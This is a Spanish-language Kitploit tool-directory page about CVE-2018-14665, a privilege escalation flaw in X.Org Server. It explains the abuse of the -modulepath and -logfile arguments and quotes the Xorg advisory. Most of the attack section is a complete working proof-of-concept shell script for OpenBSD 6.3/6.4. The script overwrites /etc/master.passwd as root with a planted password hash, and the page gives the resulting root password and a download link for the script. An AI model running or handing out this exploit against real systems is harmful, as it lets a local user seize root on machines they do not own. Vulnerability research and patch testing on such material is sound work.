Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-14665 — OpenBsd_CVE-2018-14665 | Kitploit
Herramientas/GitHubGitHub/jas502n/cve-2018-14665
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de PenetraciónRed Teaming
GitHubjas502n/cve-2018-14665

CVE-2018-14665

OpenBsd_CVE-2018-14665

Ver Repositorio
177hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-14665

0x00 Introducción

El investigador de seguridad indio Narendra Shinde descubrió en el paquete X.Org Server una vulnerabilidad crítica que permite a una cuenta de usuario normal escalar privilegios hasta root (CVE-2018-14665), que afecta a las principales distribuciones de Linux, incluyendo OpenBSD, Debian, Ubuntu, CentOS, Red Hat y Fedora.

El proyecto Xorg X proporciona la implementación de código abierto del sistema X Window (es decir, X11, o simplemente X, que es el sistema de ventanas para pantallas de mapa de bits. Proporciona el marco básico del entorno GUI: dibujar y mover ventanas en el dispositivo de visualización e interactuar con el ratón y el teclado.

Shinde descubrió que el servidor Xorg X no maneja ni valida correctamente los argumentos de al menos los dos parámetros de línea de comandos siguientes:

-modulepath: establece la ruta del directorio para buscar los módulos del servidor Xorg,

-logfile: establece un nuevo archivo de registro para el servidor Xorg, en lugar del registro predeterminado ubicado en /var/log/Xorg.n.log en la mayoría de las plataformas.

Según Narendra Shinde, un usuario con bajos privilegios puede aprovecharlo para ejecutar código malicioso y sobrescribir cualquier archivo del sistema.

Hace más de dos años, la vulnerabilidad se introdujo en el paquete X.Org Server 1.19.0.

Xorg publicó un aviso de seguridad sobre la vulnerabilidad CVE-2018-14665.

root@kitploit:~
"Cuando el servidor X se ejecuta con privilegios elevados (es decir, Xorg está instalado con el bit setuid y lo inicia un usuario no root)", según se lee en el aviso de Xorg. 

"El parámetro -modulepath se puede utilizar para especificar una ruta insegura para los módulos que se cargarán en el servidor X, lo que permite ejecutar código sin privilegios dentro de un proceso privilegiado.

Debido a una comprobación incorrecta al analizar las opciones, el parámetro -logfile se puede utilizar para sobrescribir archivos arbitrarios en el sistema de archivos."

0x01 root

El experto en seguridad Matthew Hickey también publicó un código de explotación de prueba de concepto que permite a un atacante tomar el control de los sistemas vulnerables con 3 comandos o menos.

El #0day LPE de OpenBSD mediante CVE-2018-14665 puede activarse desde una sesión SSH remota, sin necesidad de estar en la consola local. Un atacante puede tomar el control, literalmente, del sistema afectado con 3 comandos o menos.

Script de explotación: https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

POC:

root@kitploit:~
#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root. 
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD. Errata: was 
# unpatched 0day for a day on release by Xorg for
# OpenBSD systems - patched 26-10-2018.
# 
# Credit for cve-2018-14665 goes to Narendra Shinde.
# Theo explains why this flaw made it into OpenBSD
# stable releases (tested 6.3 & 6.4) as 0day himself 
# here:
#
# https://marc.info/?l=openbsd-tech&r=1&b=201810&w=2
#
# "That is the first localhost root hole in quite a 
# long time." - Theo de Raadt 25/10/18
#
# This exploit works on OpenBSD 6.3 and 6.4, ymmv.
# requires the ability to run "su" and a local
# account. Run this exploit once and it will backup
# the original passwd file to /etc/master.passwd.old
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back 
echo [+] type 'Password1' and hit enter for root
su -

Nota: tras una explotación exitosa, la nueva contraseña de root es Password1; el archivo /etc/passwd original del sistema se respalda en /etc/master.passwd.old

0x02 Enlaces de referencia

root@kitploit:~
https://twitter.com/hackerfantastic

https://securityaffairs.co/wordpress/77402/hacking/cve-2018-14665-linux-distros.html

https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

Descargar herramienta